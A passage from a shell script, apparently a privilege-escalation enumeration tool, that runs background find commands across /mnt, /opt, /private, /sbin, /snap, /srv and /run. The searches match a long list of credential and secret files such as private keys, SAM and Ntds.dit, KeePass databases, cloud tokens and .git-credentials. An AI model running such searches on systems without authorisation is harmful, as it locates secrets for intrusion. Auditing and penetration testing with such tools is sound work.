\".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name 
\"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o 
-name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MNT=`eval_bckgrd "find /mnt -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o 
-name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"sess_*\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name 
\"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_OPT=`eval_bckgrd "find /opt -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name 
\"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o 
-name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_PRIVATE=`eval_bckgrd "find /private -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name 
\"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o 
-name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_RUN=`eval_bckgrd "find /run -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SBIN=`eval_bckgrd "find /sbin -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" 
-o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name 
\".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_SNAP=`eval_bckgrd "find /snap -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name 
\"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o 
-name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SRV=`eval_bckgrd "find /srv -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o 